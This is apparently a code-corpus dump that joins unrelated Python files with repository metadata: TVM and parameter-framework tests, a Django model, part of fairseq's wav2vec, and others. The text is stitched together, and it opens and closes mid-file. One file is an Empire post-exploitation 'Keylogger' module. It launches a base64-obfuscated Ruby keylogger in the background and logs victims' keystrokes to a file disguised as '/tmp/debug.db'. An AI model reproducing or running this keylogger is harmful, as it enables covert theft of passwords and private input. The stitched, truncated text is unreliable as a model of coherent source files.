def iter_neighbors(self, mo):
for n in mo.scripts.get_huawei_ndp_neighbors():
if len(n["neighbors"]) == 1:
nn = n["neighbors"][0]
yield (n["local_interface"], nn["chassis_mac"], nn["interface"])
def get_neighbor(self, n):
return self.get_neighbor_by_mac(n)
| 31.827586
| 80
| 0.503792
|
c38271e0ec98c779f1755c0ae3e7f40538620917
| 2,248
|
py
|
Python
|
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | 16
|
2021-05-22T07:39:53.000Z
|
2022-02-23T14:50:38.000Z
|
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | null | null | null |
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | 3
|
2021-05-28T07:12:14.000Z
|
2021-11-28T02:10:48.000Z
|
import numpy as np
import tvm
import tvm.relay.testing
from tvm import relay
from tvm.relay import transform
from tvm.relay.analysis import get_calibration_data
def check_data_size(mod, data):
assert len(data) == len(mod.functions) - 1
for key, value in mod.functions.items():
if key.name_hint != "main":
assert len(data[key]["inputs"]) == len(value.params)
if isinstance(value.body, relay.Tuple):
assert len(data[key]["outputs"]) == len(value.body.fields)
else:
assert len(data[key]["outputs"]) == 1
def test_simple_graph():
# A module with two subgraphs
mod = tvm.IRModule()
x0 = relay.var("x0", shape=(8, 8))
y0 = relay.var("y0", shape=(8, 8))
z0 = x0 + y0
z1 = x0 - y0
z2 = relay.Tuple((z0, z1))
f0 = relay.Function([x0, y0], z2)
f0 = f0.with_attr("Compiler", "test_graph")
g0 = relay.GlobalVar("g0")
mod[g0] = f0
x1 = relay.var("x1", shape=(8, 8))
y1 = relay.var("y1", shape=(8, 8))
z1 = x1 - y1
f1 = relay.Function([x1, y1], z1)
f1 = f1.with_attr("Compiler", "test_graph")
g1 = relay.GlobalVar("g1")
mod[g1] = f1
x = relay.var("x", shape=(8, 8))
y = relay.var("y", shape=(8, 8))
z = relay.var("z", shape=(8, 8))
c0 = relay.Call(g0, [x, y])
c1 = relay.Call(g1, [relay.TupleGetItem(c0, 0), z])
fm = relay.Function([x, y, z], c1)
mod["main"] = fm
x_data = np.random.rand(8, 8).astype("float32")
y_data = np.random.rand(8, 8).astype("float32")
z_data = np.random.rand(8, 8).astype("float32")
data = get_calibration_data(mod, {"x": x_data, "y": y_data, "z": z_data})
# Check the number and orders
check_data_size(mod, data)
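    # Here data is keyed by the partitioned GlobalVars: data[g0] holds two
    # inputs (x_data, y_data) and two outputs (the tuple fields z0 and z1),
    # while data[g1] holds two inputs and a single output, which is exactly
    # what check_data_size verifies.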
def test_mobilenet_dnnl():
# if not tvm.get_global_func("relay.ext.dnnl", True):
# print("skip because DNNL codegen is not available")
# return
dtype = "float32"
ishape = (1, 3, 224, 224)
mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
mod = transform.AnnotateTarget(["dnnl"])(mod)
mod = transform.MergeCompilerRegions()(mod)
mod = transform.PartitionGraph()(mod)
i_data = np.random.uniform(0, 1, ishape).astype(dtype)
| 30.794521
| 85
| 0.601423
|
f927cdaa9a9342d8e13c04314a6033dd7b28485a
| 10,631
|
py
|
Python
|
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*-coding:utf-8 -*
# Copyright (c) 2011-2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Integer parameter type testcases - INT16
List of tested functions :
--------------------------
- [setParameter] function
- [getParameter] function
Initial Settings :
------------------
INT16 :
- size = 16
- range : [-1000, 1000]
Test cases :
------------
- INT16 parameter min value = -1000
- INT16 parameter min value out of bounds = -1001
- INT16 parameter max value = 1000
- INT16 parameter max value out of bounds = 1001
- INT16 parameter in nominal case = 50
"""
import commands
from Util.PfwUnitTestLib import PfwTestCase
from Util import ACTLogging
log=ACTLogging.Logger()
# Test of type INT16 - range [-1000, 1000]
class TestCases(PfwTestCase):
def setUp(self):
self.param_name = "/Test/Test/TEST_DIR/INT16"
self.pfw.sendCmd("setTuningMode", "on")
def tearDown(self):
self.pfw.sendCmd("setTuningMode", "off")
def test_Nominal_Case(self):
"""
Testing INT16 in nominal case = 50
----------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 parameter in nominal case = 50
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to 50
- Blackboard and filesystem values checked
"""
log.D(self.test_Nominal_Case.__doc__)
log.I("INT16 parameter in nominal case = 50")
value = "50"
hex_value = "0x32"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMin(self):
"""
Testing INT16 minimal value = -1000
-----------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 parameter min value = -1000
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to -1000
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMin.__doc__)
log.I("INT16 parameter min value = -1000")
value = "-1000"
hex_value = "0xfc18"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMin_Overflow(self):
"""
Testing INT16 parameter value out of negative range
---------------------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to -1001
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- error detected
- INT16 parameter not updated
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMin_Overflow.__doc__)
log.I("INT16 parameter min value out of bounds = -1001")
value = "-1001"
param_check = commands.getoutput('cat $PFW_RESULT/INT16')
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
% (self.param_name))
#Check parameter value on filesystem
        assert commands.getoutput('cat $PFW_RESULT/INT16') == param_check, log.F("FILESYSTEM : Forbidden parameter change")
log.I("test OK")
def test_TypeMax(self):
"""
Testing INT16 parameter maximum value
-------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to 1000
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to 1000
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMax.__doc__)
log.I("INT16 parameter max value = 1000")
value = "1000"
hex_value = "0x3e8"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMax_Overflow(self):
"""
Testing INT16 parameter value out of positive range
---------------------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to 1001
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- error detected
- INT16 parameter not updated
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMax_Overflow.__doc__)
log.I("INT16 parameter max value out of bounds = 1001")
value = "1001"
param_check = commands.getoutput('cat $PFW_RESULT/INT16')
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
% (self.param_name))
#Check parameter value on filesystem
        assert commands.getoutput('cat $PFW_RESULT/INT16') == param_check, log.F("FILESYSTEM : Forbidden parameter change")
log.I("test OK")
| 43.215447
| 122
| 0.541529
|
c5b334b27b40d91c535594a2cca4c022b88d11b9
| 7,627
|
py
|
Python
|
lib/modules/python/collection/linux/keylogger.py
|
Gui-Luz/Empire
|
6f5eeff5f46dd085e1317cb09b39853a2fce5d13
|
[
"BSD-3-Clause"
] | 5,720
|
2017-02-02T13:59:40.000Z
|
2022-03-31T09:50:10.000Z
|
lib/modules/python/collection/linux/keylogger.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 866
|
2017-02-02T10:56:31.000Z
|
2020-01-17T07:47:05.000Z
|
lib/modules/python/collection/linux/keylogger.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 2,181
|
2017-02-04T10:28:41.000Z
|
2022-03-31T04:36:56.000Z
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
            'Name': 'Keylogger',
# list of one or more authors for the module
'Author': ['joev', '@harmj0y'],
# more verbose multi-line description of the module
'Description': ("Logs keystrokes to the specified file. Ruby based and heavily adapted from MSF's osx/capture/keylog_recorder. Kill the resulting PID when keylogging is finished and download the specified LogFile."),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': "",
# if the module needs administrative privileges
'NeedsAdmin': False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
"https://github.com/amoffat/pykeylogger"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to keylog.',
'Required' : True,
'Value' : ''
},
'LogFile': {
'Description' : 'Text file to log keystrokes out to.',
'Required' : True,
'Value' : '/tmp/debug.db'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
logFile = self.options['LogFile']['Value']
# base64'ed launcher of ./data/misc/keylogger.rb from MSF
script = """
import os,time
output = os.popen('echo "require \\\'base64\\\';eval(Base64.decode64(\\\'cmVxdWlyZSAndGhyZWFkJwpyZXF1aXJlICdkbCcKcmVxdWlyZSAnZGwvaW1wb3J0JwpJbXBvcnRlciA9IGlmIGRlZmluZWQ/KERMOjpJbXBvcnRlcikgdGhlbiBETDo6SW1wb3J0ZXIgZWxzZSBETDo6SW1wb3J0YWJsZSBlbmQKZGVmIHJ1YnlfMV85X29yX2hpZ2hlcj8KICBSVUJZX1ZFUlNJT04udG9fZiA+PSAxLjkKZW5kCmRlZiBtYWxsb2Moc2l6ZSkKICBpZiBydWJ5XzFfOV9vcl9oaWdoZXI/CiAgICBETDo6Q1B0ci5tYWxsb2Moc2l6ZSkKICBlbHNlCiAgICBETDo6bWFsbG9jKHNpemUpCiAgZW5kCmVuZAppZiBub3QgcnVieV8xXzlfb3JfaGlnaGVyPwogIG1vZHVsZSBETAogICAgbW9kdWxlIEltcG9ydGFibGUKICAgICAgZGVmIG1ldGhvZF9taXNzaW5nKG1ldGgsICphcmdzLCAmYmxvY2spCiAgICAgICAgc3RyID0gbWV0aC50b19zCiAgICAgICAgbG93ZXIgPSBzdHJbMCwxXS5kb3duY2FzZSArIHN0clsxLi4tMV0KICAgICAgICBpZiBzZWxmLnJlc3BvbmRfdG8/IGxvd2VyCiAgICAgICAgICBzZWxmLnNlbmQgbG93ZXIsICphcmdzCiAgICAgICAgZWxzZQogICAgICAgICAgc3VwZXIKICAgICAgICBlbmQKICAgICAgZW5kCiAgICBlbmQKICBlbmQKZW5kClNNX0tDSFJfQ0FDSEUgPSAzOApTTV9DVVJSRU5UX1NDUklQVCA9IC0yCk1BWF9BUFBfTkFNRSA9IDgwCm1vZHVsZSBDYXJib24KICBleHRlbmQgSW1wb3J0ZXIKICBkbGxvYWQgJy9TeXN0ZW0vTGlicmFyeS9GcmFtZXdvcmtzL0NhcmJvbi5mcmFtZXdvcmsvQ2FyYm9uJwogIGV4dGVybiAndW5zaWduZWQgbG9uZyBDb3B5UHJvY2Vzc05hbWUoY29uc3QgUHJvY2Vzc1NlcmlhbE51bWJlciAqLCB2b2lkICopJwogIGV4dGVybiAndm9pZCBHZXRGcm9udFByb2Nlc3MoUHJvY2Vzc1NlcmlhbE51bWJlciAqKScKICBleHRlcm4gJ3ZvaWQgR2V0S2V5cyh2b2lkICopJwogIGV4dGVybiAndW5zaWduZWQgY2hhciAqR2V0U2NyaXB0VmFyaWFibGUoaW50LCBpbnQpJwogIGV4dGVybiAndW5zaWduZWQgY2hhciBLZXlUcmFuc2xhdGUodm9pZCAqLCBpbnQsIHZvaWQgKiknCiAgZXh0ZXJuICd1bnNpZ25lZCBjaGFyIENGU3RyaW5nR2V0Q1N0cmluZyh2b2lkICosIHZvaWQgKiwgaW50LCBpbnQpJwogIGV4dGVybiAnaW50IENGU3RyaW5nR2V0TGVuZ3RoKHZvaWQgKiknCmVuZApwc24gPSBtYWxsb2MoMTYpCm5hbWUgPSBtYWxsb2MoMTYpCm5hbWVfY3N0ciA9IG1hbGxvYyhNQVhfQVBQX05BTUUpCmtleW1hcCA9IG1hbGxvYygxNikKc3RhdGUgPSBtYWxsb2MoOCkKaXR2X3N0YXJ0ID0gVGltZS5ub3cudG9faQpwcmV2X2Rvd24gPSBIYXNoLm5ldyhmYWxzZSkKbGFzdFdpbmRvdyA9ICIiCndoaWxlICh0cnVlKSBkbwogIENhcmJvbi5HZXRGcm9udFByb2Nlc3MocHNuLnJlZikKICBDYXJib24uQ29weVByb2Nlc3NOYW1lKHBzbi5yZWYsIG5hbWUucmVmKQogIENhcmJvbi5HZXRLZXlzKGtleW1hcCkKICBzdHJfbGVuID0gQ2FyYm9uLkNGU3RyaW5nR2V0TGVuZ3RoKG5hbWUpCiAgY29waWVkID0gQ2FyYm9uLkNGU3RyaW5nR2V0Q1N0cmluZyhuYW1lLCBuYW1lX2NzdHIsIE1BWF9BUFBfTkFNRSwgMHgwODAwMDEwMCkgPiAwCiAgYXBwX25hbWUgPSBpZiBjb3BpZWQgdGhlbiBuYW1lX2NzdHIudG9fcyBlbHNlICdVbmtub3duJyBlbmQKICBieXRlcyA9IGtleW1hcC50b19zdHIKICBjYXBfZmxhZyA9IGZhbHNlCiAgYXNjaWkgPSAwCiAgY3RybGNoYXIgPSAiIgogICgwLi4uMTI4KS5lYWNoIGRvIHxrfAogICAgaWYgKChieXRlc1trPj4zXS5vcmQgPj4gKGsmNykpICYgMSA+IDApCiAgICAgIGlmIG5vdCBwcmV2X2Rvd25ba10KICAgICAgICBjYXNlIGsKICAgICAgICAgIHdoZW4gMzYKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2VudGVyXSIKICAgICAgICAgIHdoZW4gNDgKICAgICAgICAgICAgY3RybGNoYXIgPSAiW3RhYl0iCiAgICAgICAgICB3aGVuIDQ5CiAgICAgICAgICAgIGN0cmxjaGFyID0gIiAiCiAgICAgICAgICB3aGVuIDUxCiAgICAgICAgICAgIGN0cmxjaGFyID0gIltkZWxldGVdIgogICAgICAgICAgd2hlbiA1MwogICAgICAgICAgICBjdHJsY2hhciA9ICJbZXNjXSIKICAgICAgICAgIHdoZW4gNTUKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2NtZF0iCiAgICAgICAgICB3aGVuIDU2CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltzaGlmdF0iCiAgICAgICAgICB3aGVuIDU3CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltjYXBzXSIKICAgICAgICAgIHdoZW4gNTgKICAgICAgICAgICAgY3RybGNoYXIgPSAiW29wdGlvbl0iCiAgICAgICAgICB3aGVuIDU5CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltjdHJsXSIKICAgICAgICAgIHdoZW4gNjMKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2ZuXSIKICAgICAgICAgIGVsc2UKICAgICAgICAgICAgY3RybGNoYXIgPSAiIgogICAgICAgIGVuZAogICAgICAgIGlmIGN0cmxjaGFyID09ICIiIGFuZCBhc2NpaSA9PSAwCiAgICAgICAgICBrY2hyID0gQ2FyYm9uLkdldFNjcmlwdFZhcmlhYmxlKFNNX0tDSFJfQ0FDSEUsIFNNX0NVUlJFTlRfU0NSSVBUKQogICAgICAgICAgY3Vycl9hc2NpaSA9IENhcmJvbi5LZXlUcmFuc2xhdGUoa2Nociwgaywgc3RhdGUpCiAgICAgICAgICBjdXJyX2FzY2lpID
0gY3Vycl9hc2NpaSA+PiAxNiBpZiBjdXJyX2FzY2lpIDwgMQogICAgICAgICAgcHJldl9kb3duW2tdID0gdHJ1ZQogICAgICAgICAgaWYgY3Vycl9hc2NpaSA9PSAwCiAgICAgICAgICAgIGNhcF9mbGFnID0gdHJ1ZQogICAgICAgICAgZWxzZQogICAgICAgICAgICBhc2NpaSA9IGN1cnJfYXNjaWkKICAgICAgICAgIGVuZAogICAgICAgIGVsc2lmIGN0cmxjaGFyICE9ICIiCiAgICAgICAgICBwcmV2X2Rvd25ba10gPSB0cnVlCiAgICAgICAgZW5kCiAgICAgIGVuZAogICAgZWxzZQogICAgICBwcmV2X2Rvd25ba10gPSBmYWxzZQogICAgZW5kCiAgZW5kCiAgaWYgYXNjaWkgIT0gMCBvciBjdHJsY2hhciAhPSAiIgogICAgaWYgYXBwX25hbWUgIT0gbGFzdFdpbmRvdwogICAgICBwdXRzICJcblxuWyN7YXBwX25hbWV9XSAtIFsje1RpbWUubm93fV1cbiIKICAgICAgbGFzdFdpbmRvdyA9IGFwcF9uYW1lCiAgICBlbmQKICAgIGlmIGN0cmxjaGFyICE9ICIiCiAgICAgIHByaW50ICIje2N0cmxjaGFyfSIKICAgIGVsc2lmIGFzY2lpID4gMzIgYW5kIGFzY2lpIDwgMTI3CiAgICAgIGMgPSBpZiBjYXBfZmxhZyB0aGVuIGFzY2lpLmNoci51cGNhc2UgZWxzZSBhc2NpaS5jaHIgZW5kCiAgICAgIHByaW50ICIje2N9IgogICAgZWxzZQogICAgICBwcmludCAiWyN7YXNjaWl9XSIKICAgIGVuZAogICAgJHN0ZG91dC5mbHVzaAogIGVuZAogIEtlcm5lbC5zbGVlcCgwLjAxKQplbmQK\\\'))" | ruby > %s &').read()
time.sleep(1)
pids = os.popen('ps aux | grep " ruby" | grep -v grep').read()
print pids
print "kill ruby PID and download %s when completed"
""" % (logFile, logFile)
return script
| 87.666667
| 4,547
| 0.814475
|
336917575441f2690e4fc80a9eb5efad81a3f404
| 795
|
py
|
Python
|
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | null | null | null |
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | 76
|
2018-03-15T09:37:56.000Z
|
2019-05-15T12:45:51.000Z
|
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | 1
|
2020-10-31T07:15:22.000Z
|
2020-10-31T07:15:22.000Z
|
# -*- coding=utf-8 -*-
"""
Weekly report model module.
"""
from django.db import models
class WeeklyReport(models.Model):
"""
Weekly report model
"""
week_number = models.PositiveIntegerField()
location = models.ForeignKey('Location', on_delete=models.CASCADE)
structures = models.IntegerField(default=0)
# visited - 20% of the structures have been sprayed in the spray area
visited = models.PositiveIntegerField(default=0)
# sprayed - 20% of the structures have been sprayed in the spray area
sprayed = models.PositiveIntegerField(default=0)
created_on = models.DateTimeField(auto_now_add=True)
modified_on = models.DateTimeField(auto_now=True)
class Meta:
app_label = 'main'
unique_together = ('week_number', 'location')
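    # Because of the unique_together constraint above there is one record per
    # (week_number, location); an illustrative upsert (names are hypothetical):
    #   WeeklyReport.objects.get_or_create(
    #       week_number=12, location=some_location,
    #       defaults={"structures": 100, "visited": 40, "sprayed": 30})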
| 30.576923
| 73
| 0.704403
|
62807764efaa987d930a2690fa456be8295b37db
| 18,388
|
py
|
Python
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 239
|
2020-05-12T16:07:49.000Z
|
2022-03-29T20:07:36.000Z
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 35
|
2020-11-02T10:53:20.000Z
|
2022-03-18T20:58:07.000Z
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 38
|
2020-11-07T19:23:25.000Z
|
2022-03-31T08:56:33.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import (
BaseFairseqModel, register_model, register_model_architecture
)
@register_model('wav2vec')
class Wav2VecModel(BaseFairseqModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument('--prediction-steps', type=int, metavar='N', help='number of steps ahead to predict')
parser.add_argument('--sample-distance', type=int, metavar='N',
help='sample distance from target. does not work properly with cross-sampling')
parser.add_argument('--cross-sample-negatives', action='store_true',
help='whether to sample negatives across examples in the same batch')
parser.add_argument('--num-negatives', type=int, metavar='N', help='number of negative examples')
parser.add_argument('--conv-feature-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--conv-aggregator-layers', type=str, metavar='EXPR',
                            help='convolutional aggregator layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--dropout', type=float, metavar='D', help='dropout to apply within the model')
parser.add_argument('--dropout-features', type=float, metavar='D', help='dropout to apply to the features')
parser.add_argument('--dropout-agg', type=float, metavar='D', help='dropout to apply after aggregation step')
parser.add_argument('--encoder', type=str, choices=['cnn'], help='type of encoder to use')
parser.add_argument('--aggregator', type=str, choices=['cnn', 'gru'],
help='type of aggregator to use')
parser.add_argument('--gru-dim', type=int, metavar='N', help='GRU dimensionality')
parser.add_argument('--no-conv-bias', action='store_true',
help='if set, does not learn bias for conv layers')
parser.add_argument('--agg-zero-pad', action='store_true',
help='if set, zero pads in aggregator instead of repl pad')
parser.add_argument('--skip-connections-feat', action='store_true',
help='if set, adds skip connections to the feature extractor')
parser.add_argument('--skip-connections-agg', action='store_true',
help='if set, adds skip connections to the aggregator')
parser.add_argument('--residual-scale', type=float, metavar='D',
help='scales residual by sqrt(value)')
parser.add_argument('--log-compression', action='store_true',
help='if set, adds a log compression to feature extractor')
parser.add_argument('--balanced-classes', action='store_true',
help='if set, loss is scaled to balance for number of negatives')
parser.add_argument('--project-features', choices=['none', 'same', 'new'],
help='if not none, features are projected using the (same or new) aggregator')
parser.add_argument('--non-affine-group-norm', action='store_true',
help='if set, group norm is not affine')
parser.add_argument('--offset', help='if set, introduces an offset from target to predictions. '
'if set to "auto", it is computed automatically from the receptive field')
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_wav2vec_architecture(args)
model = Wav2VecModel(args)
print(model)
return model
def __init__(self, args):
super().__init__()
self.prediction_steps = args.prediction_steps
offset = args.offset
if args.encoder == 'cnn':
feature_enc_layers = eval(args.conv_feature_layers)
self.feature_extractor = ConvFeatureExtractionModel(
conv_layers=feature_enc_layers,
dropout=0.,
log_compression=args.log_compression,
skip_connections=args.skip_connections_feat,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
)
embed = feature_enc_layers[-1][0]
else:
raise Exception('unknown encoder type ' + args.encoder)
if args.offset == 'auto':
assert args.encoder == 'cnn'
jin = 0
rin = 0
for _, k, stride in feature_enc_layers:
if rin == 0:
rin = k
rin = rin + (k - 1) * jin
if jin == 0:
jin = stride
else:
jin *= stride
offset = math.ceil(rin / jin)
offset = int(offset)
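        # With the default feature extractor layers
        # '[(512, 10, 5)] + [(512, 8, 4)] + [(512, 4, 2)] * 3' this works out
        # to a receptive field of 465 samples and a total stride of 160, so
        # offset = ceil(465 / 160) = 3.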
def make_aggregator():
if args.aggregator == 'cnn':
agg_layers = eval(args.conv_aggregator_layers)
agg_dim = agg_layers[-1][0]
feature_aggregator = ConvAggegator(
conv_layers=agg_layers,
embed=embed,
dropout=args.dropout,
skip_connections=args.skip_connections_agg,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
conv_bias=not args.no_conv_bias,
zero_pad=args.agg_zero_pad,
)
elif args.aggregator == 'gru':
agg_dim = args.gru_dim
feature_aggregator = nn.Sequential(
TransposeLast(),
nn.GRU(
input_size=embed,
hidden_size=agg_dim,
num_layers=1,
dropout=args.dropout,
),
TransposeLast(deconstruct_idx=0),
)
else:
raise Exception('unknown aggregator type ' + args.aggregator)
return feature_aggregator, agg_dim
self.feature_aggregator, agg_dim = make_aggregator()
self.wav2vec_predictions = Wav2VecPredictionsModel(
in_dim=agg_dim,
out_dim=embed,
prediction_steps=args.prediction_steps,
n_negatives=args.num_negatives,
cross_sample_negatives=args.cross_sample_negatives,
sample_distance=args.sample_distance,
dropout=args.dropout,
offset=offset,
balanced_classes=args.balanced_classes,
)
self.dropout_feats = nn.Dropout(p=args.dropout_features)
self.dropout_agg = nn.Dropout(p=args.dropout_agg)
if args.project_features == 'none':
self.project_features = None
elif args.project_features == 'same':
self.project_features = self.feature_aggregator
elif args.project_features == 'new':
self.project_features, _ = make_aggregator()
def forward(self, source):
result = {}
features = self.feature_extractor(source)
